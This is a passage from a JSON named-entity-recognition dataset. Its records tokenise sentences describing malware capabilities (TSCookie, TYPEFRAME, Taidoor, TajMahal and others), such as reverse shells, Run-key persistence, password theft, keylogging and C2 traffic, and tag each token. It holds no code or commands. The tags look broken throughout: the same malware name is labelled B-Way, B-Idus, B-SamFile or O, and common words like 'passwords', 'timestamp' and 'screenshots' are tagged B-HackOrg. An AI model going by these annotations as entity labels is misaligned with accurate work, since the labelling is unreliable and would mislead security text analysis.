- }, - { - "tokens": [ - "The", - "TAINTEDSCRIBE", - "command", - "and", - "execution", - "module", - "can", - "perform", - "target", - "system", - "enumeration." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TAINTEDSCRIBE", - "uses", - "a", - "Linear", - "Feedback", - "Shift", - "Register", - "(LFSR)", - "algorithm", - "for", - "network", - "encryption." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TAINTEDSCRIBE", - "can", - "use", - "<code>DriveList</code>", - "to", - "retrieve", - "drive", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TAINTEDSCRIBE", - "can", - "execute", - "<code>GetLocalTime</code>", - "for", - "time", - "discovery." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TAINTEDSCRIBE", - "can", - "change", - "the", - "timestamp", - "of", - "specified", - "filenames." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TAINTEDSCRIBE", - "can", - "enable", - "Windows", - "CLI", - "access", - "and", - "execute", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "TDTESS", - "creates", - "then", - "deletes", - "log", - "files", - "during", - "installation", - "of", - "itself", - "as", - "a", - "service." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TDTESS", - "has", - "a", - "command", - "to", - "download", - "and", - "execute", - "an", - "additional", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "creating", - "a", - "new", - "service", - "for", - "persistence,", - "TDTESS", - "sets", - "the", - "file", - "creation", - "time", - "for", - "the", - "service", - "to", - "the", - "creation", - "time", - "of", - "the", - "victim's", - "legitimate", - "svchost.exe", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "TDTESS", - "provides", - "a", - "reverse", - "shell", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "running", - "as", - "administrator,", - "TDTESS", - "installs", - "itself", - "as", - "a", - "new", - "service", - "named", - "bmwappushservice", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TEARDROP", - "was", - "decoded", - "using", - "a", - "custom", - "rolling", - "XOR", - "algorithm", - "to", - "execute", - "a", - "customized", - "Cobalt", - "Strike", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "TEARDROP", - "files", - "had", - "names", - "that", - "resembled", - "legitimate", - "Window", - "file", - "and", - "directory", - "names." - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TEARDROP", - "modified", - "the", - "Registry", - "to", - "create", - "a", - "Windows", - "service", - "for", - "itself", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TEARDROP", - "created", - "and", - "read", - "from", - "a", - "file", - "with", - "a", - "fake", - "JPG", - "header,", - "and", - "its", - "payload", - "was", - "encrypted", - "with", - "a", - "simple", - "rotating", - "XOR", - "cipher." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TEARDROP", - "checked", - "that", - "<code>HKU\\SOFTWARE\\Microsoft\\CTF</code>", - "existed", - "before", - "decoding", - "its", - "embedded", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TEARDROP", - "ran", - "as", - "a", - "Windows", - "service", - "from", - "the", - "<code>c:\\windows\\syswow64</code>", - "folder." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TEXTMATE", - "uses", - "DNS", - "TXT", - "records", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TEXTMATE", - "executes", - "cmd.exe", - "to", - "provide", - "a", - "reverse", - "shell", - "to", - "adversaries." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "a", - "document", - "is", - "found", - "matching", - "one", - "of", - "the", - "extensions", - "in", - "the", - "configuration,", - "TINYTYPHON", - "uploads", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TINYTYPHON", - "has", - "used", - "XOR", - "with", - "0x90", - "to", - "obfuscate", - "its", - "configuration", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TINYTYPHON", - "searches", - "through", - "the", - "drive", - "containing", - "the", - "OS,", - "then", - "all", - "drive", - "letters", - "C", - "through", - "to", - "Z,", - "for", - "documents", - "matching", - "certain", - "extensions." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TINYTYPHON", - "installs", - "itself", - "under", - "Registry", - "Run", - "key", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TSCookie", - "has", - "the", - "ability", - "to", - "steal", - "saved", - "passwords", - "from", - "the", - "Internet", - "Explorer,", - "Edge,", - "Firefox,", - "and", - "Chrome", - "browsers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "TSCookie", - "has", - "the", - "ability", - "to", - "decrypt,", - "load,", - "and", - "execute", - "a", - "DLL", - "and", - "its", - "resources." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TSCookie", - "has", - "the", - "ability", - "to", - "discover", - "drive", - "information", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TSCookie", - "has", - "the", - "ability", - "to", - "upload", - "and", - "download", - "files", - "to", - "and", - "from", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TSCookie", - "has", - "been", - "executed", - "via", - "malicious", - "links", - "embedded", - "in", - "e-mails", - "spoofing", - "the", - "Ministries", - "of", - "Education,", - "Culture,", - "Sports,", - "Science", - "and", - "Technology", - "of", - "Japan." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Idus", - "B-Idus", - "B-Idus", - "B-Idus", - "O", - "B-Idus", - "O", - "B-Area" - ] - }, - { - "tokens": [ - "TSCookie", - "can", - "use", - "ICMP", - "to", - "receive", - "information", - "on", - "the", - "destination", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TSCookie", - "has", - "the", - "ability", - "to", - "list", - "processes", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TSCookie", - "has", - "the", - "ability", - "to", - "inject", - "code", - "into", - "the", - "svchost.exe,", - "iexplorer.exe,", - "explorer.exe,", - "and", - "default", - "browser", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "B-Way", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TSCookie", - "has", - "the", - "ability", - "to", - "proxy", - "communications", - "with", - "command", - "and", - "control", - "(C2)", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TSCookie", - "has", - "encrypted", - "network", - "communications", - "with", - "RC4." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TSCookie", - "has", - "the", - "ability", - "to", - "identify", - "the", - "IP", - "of", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TSCookie", - "can", - "multiple", - "protocols", - "including", - "HTTP", - "and", - "HTTPS", - "in", - "communication", - "with", - "command", - "and", - "control", - "(C2)", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TSCookie", - "has", - "the", - "ability", - "to", - "execute", - "shell", - "commands", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TURNEDUP", - "is", - "capable", - "of", - "injecting", - "code", - "into", - "the", - "APC", - "queue", - "of", - "a", - "created", - "Rundll32", - "process", - "as", - "part", - "of", - "an", - "\"Early", - "Bird", - "injection.\"" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "TURNEDUP", - "is", - "capable", - "of", - "downloading", - "additional", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "TURNEDUP", - "is", - "capable", - "of", - "writing", - "to", - "a", - "Registry", - "Run", - "key", - "to", - "establish." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TURNEDUP", - "is", - "capable", - "of", - "taking", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "TURNEDUP", - "is", - "capable", - "of", - "gathering", - "system", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "TURNEDUP", - "is", - "capable", - "of", - "creating", - "a", - "reverse", - "shell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "One", - "TYPEFRAME", - "variant", - "decrypts", - "an", - "archive", - "using", - "an", - "RC4", - "key,", - "then", - "decompresses", - "and", - "installs", - "the", - "decrypted", - "malicious", - "DLL", - "module.", - "Another", - "variant", - "decodes", - "the", - "embedded", - "file", - "by", - "XORing", - "it", - "with", - "the", - "value", - "\"0x35\"." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TYPEFRAME", - "can", - "open", - "the", - "Windows", - "Firewall", - "on", - "the", - "victim’s", - "machine", - "to", - "allow", - "incoming", - "connections." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APIs", - "and", - "strings", - "in", - "some", - "TYPEFRAME", - "variants", - "are", - "RC4", - "encrypted.", - "Another", - "variant", - "is", - "encoded", - "with", - "XOR." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TYPEFRAME", - "can", - "delete", - "files", - "off", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TYPEFRAME", - "can", - "search", - "directories", - "for", - "files", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TYPEFRAME", - "can", - "install", - "and", - "store", - "encrypted", - "configuration", - "data", - "under", - "the", - "Registry", - "key", - "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll</code>", - "and", - "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "TYPEFRAME", - "can", - "upload", - "and", - "download", - "files", - "to", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Word", - "document", - "delivering", - "TYPEFRAME", - "prompts", - "the", - "user", - "to", - "enable", - "macro", - "execution." - ], - "ner_tags": [ - "O", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TYPEFRAME", - "can", - "install", - "encrypted", - "configuration", - "data", - "under", - "the", - "Registry", - "key", - "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll</code>", - "and", - "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "TYPEFRAME", - "has", - "used", - "ports", - "443,", - "8080,", - "and", - "8443", - "with", - "a", - "FakeTLS", - "method." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "A", - "TYPEFRAME", - "variant", - "can", - "force", - "the", - "compromised", - "system", - "to", - "function", - "as", - "a", - "proxy", - "server." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TYPEFRAME", - "can", - "gather", - "the", - "disk", - "volume", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "TYPEFRAME", - "has", - "used", - "a", - "malicious", - "Word", - "document", - "for", - "delivery", - "with", - "VBA", - "macros", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TYPEFRAME", - "can", - "uninstall", - "malware", - "components", - "using", - "a", - "batch", - "script.", - "TYPEFRAME", - "can", - "execute", - "commands", - "using", - "a", - "shell." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-HackOrg", - "O", - "O", - "O", - "I-Way", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "TYPEFRAME", - "variants", - "can", - "add", - "malicious", - "DLL", - "modules", - "as", - "new", - "services.TYPEFRAME", - "can", - "also", - "delete", - "services", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "B-Features", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Taidoor", - "can", - "upload", - "data", - "and", - "files", - "from", - "a", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Taidoor", - "can", - "use", - "a", - "stream", - "cipher", - "to", - "decrypt", - "stings", - "used", - "by", - "the", - "malware." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Taidoor", - "can", - "perform", - "DLL", - "loading." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "Taidoor", - "can", - "use", - "encrypted", - "string", - "blocks", - "for", - "obfuscation." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Taidoor", - "can", - "use", - "<code>DeleteFileA</code>", - "to", - "remove", - "files", - "from", - "infected", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Taidoor", - "can", - "search", - "for", - "specific", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Taidoor", - "has", - "downloaded", - "additional", - "files", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Taidoor", - "has", - "relied", - "upon", - "a", - "victim", - "to", - "click", - "on", - "a", - "malicious", - "email", - "attachment." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Taidoor", - "has", - "the", - "ability", - "to", - "modify", - "the", - "Registry", - "on", - "compromised", - "hosts", - "using", - "<code>RegDeleteValueA</code>", - "and", - "<code>RegCreateKeyExA</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Taidoor", - "has", - "the", - "ability", - "to", - "use", - "native", - "APIs", - "for", - "execution", - "including", - "<code>GetProcessHeap</code>,", - "<code>GetProcAddress</code>,", - "and", - "<code>LoadLibrary</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Taidoor", - "can", - "use", - "TCP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Taidoor", - "can", - "use", - "<code>GetCurrentProcessId</code>", - "for", - "process", - "discovery." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Taidoor", - "can", - "query", - "the", - "Registry", - "on", - "compromised", - "hosts", - "using", - "<code>RegQueryValueExA</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Taidoor", - "has", - "modified", - "the", - "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "key", - "for", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Taidoor", - "has", - "been", - "delivered", - "through", - "spearphishing", - "emails." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Taidoor", - "uses", - "RC4", - "to", - "encrypt", - "the", - "message", - "body", - "of", - "HTTP", - "content." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Taidoor", - "has", - "collected", - "the", - "MAC", - "address", - "of", - "a", - "compromised", - "host;", - "it", - "can", - "also", - "use", - "<code>GetAdaptersInfo</code>", - "to", - "identify", - "network", - "adapters." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Taidoor", - "can", - "use", - "<code>GetLocalTime</code>", - "and", - "<code>GetSystemTime</code>", - "to", - "collect", - "system", - "time." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Taidoor", - "has", - "used", - "HTTP", - "GET", - "and", - "POST", - "requests", - "for", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Taidoor", - "can", - "copy", - "cmd.exe", - "into", - "the", - "system", - "temp", - "folder." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "use", - "the", - "open", - "source", - "libraries", - "XZip/Xunzip", - "and", - "zlib", - "to", - "compress", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "capture", - "VoiceIP", - "application", - "audio", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "index", - "and", - "compress", - "files", - "into", - "a", - "send", - "queue", - "for", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "manage", - "an", - "automated", - "queue", - "of", - "egress", - "files", - "and", - "commands", - "sent", - "to", - "its", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "steal", - "data", - "from", - "the", - "clipboard", - "of", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "steal", - "documents", - "from", - "the", - "local", - "system", - "including", - "the", - "print", - "spooler", - "queue." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "steal", - "written", - "CD", - "images", - "and", - "files", - "of", - "interest", - "from", - "previously", - "connected", - "removable", - "drives", - "when", - "they", - "become", - "available", - "again." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "inject", - "DLLs", - "for", - "malicious", - "plugins", - "into", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "send", - "collected", - "files", - "over", - "its", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "index", - "files", - "from", - "drives,", - "user", - "profiles,", - "and", - "removable", - "drives." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "capture", - "keystrokes", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "can", - "set", - "the", - "<code>KeepPrintedJobs</code>", - "attribute", - "for", - "configured", - "printers", - "in", - "<code>SOFTWARE\\\\Microsoft\\\\Windows", - "NT\\\\CurrentVersion\\\\Print\\\\Printers</code>", - "to", - "enable", - "document", - "stealing." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "used", - "an", - "encrypted", - "Virtual", - "File", - "System", - "to", - "store", - "plugins." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "identify", - "connected", - "Apple", - "devices." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Exp", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "identify", - "running", - "processes", - "and", - "associated", - "plugins", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", - "take", - "screenshots", - "on", - "an", - "infected", - "host", - "including", - "capturing", - "content", - "from", - "windows", - "of", - "instant", - "messaging", - "applications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TajMahal", - "has", - "the", - "ability", - "to", 